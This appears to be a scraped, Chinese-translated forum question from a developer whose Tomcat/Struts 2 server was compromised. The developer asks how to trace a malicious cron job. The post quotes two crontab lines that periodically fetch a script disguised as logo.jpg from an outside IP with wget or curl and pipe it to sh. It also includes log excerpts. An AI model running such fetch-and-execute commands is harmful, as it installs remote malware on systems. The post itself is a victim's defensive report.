小编Abh*_*til的帖子

通过未知来源的 cron 对 Apache 服务器的 Shell 脚本攻击

在 Apache tomcat 服务器上运行项目战争时，我发现服务器已被入侵。

对未知进行战争的cron过程就像这样

[root@App2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

Run Code Online (Sandbox Code Playgroud)

下载的logo.jpg有一个 shell 脚本，它正在下载恶意软件。

我在下面的这个网站上发现了一个类似的问题

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

和

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

我无法在我的整个代码中找到这个 cron 调度程序的来源。

我想知道有没有人遇到过这个问题？以及我应该如何在代码中找到调度程序的来源。

笔记：

我正在开发一个 JAVA(Struts 2)+jsp+javascript+jquery web 项目。

每次我使用项目的 war 文件启动我的 tomcat 时，这个调度程序都会运行，但是我无法在我的代码中找到任何调度程序的调度程序。

我在我的日志文件中发现了以下行

[INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - Unable to find 'struts.multipart.saveDir' property setting. Defaulting to javax.servlet.context.tempdir [DEBUG] 2017-06-02 17:00:41,565 org.apache.struts2.dispatcher.Dispatcher debug - saveDir=/opt/tomcat/work/Catalina/localhost/MyApplication [WARN] …
Run Code Online (Sandbox Code Playgroud)

security linux tomcat shell

Abh*_*til

2018 08-25

8
推荐指数

1
解决办法

3554
查看次数

标签统计

linux ×1

security ×1

shell ×1

tomcat ×1

通过未知来源的 cron 对 Apache 服务器的 Shell 脚本攻击

标签 统计

小编Abh_til的帖子

标签统计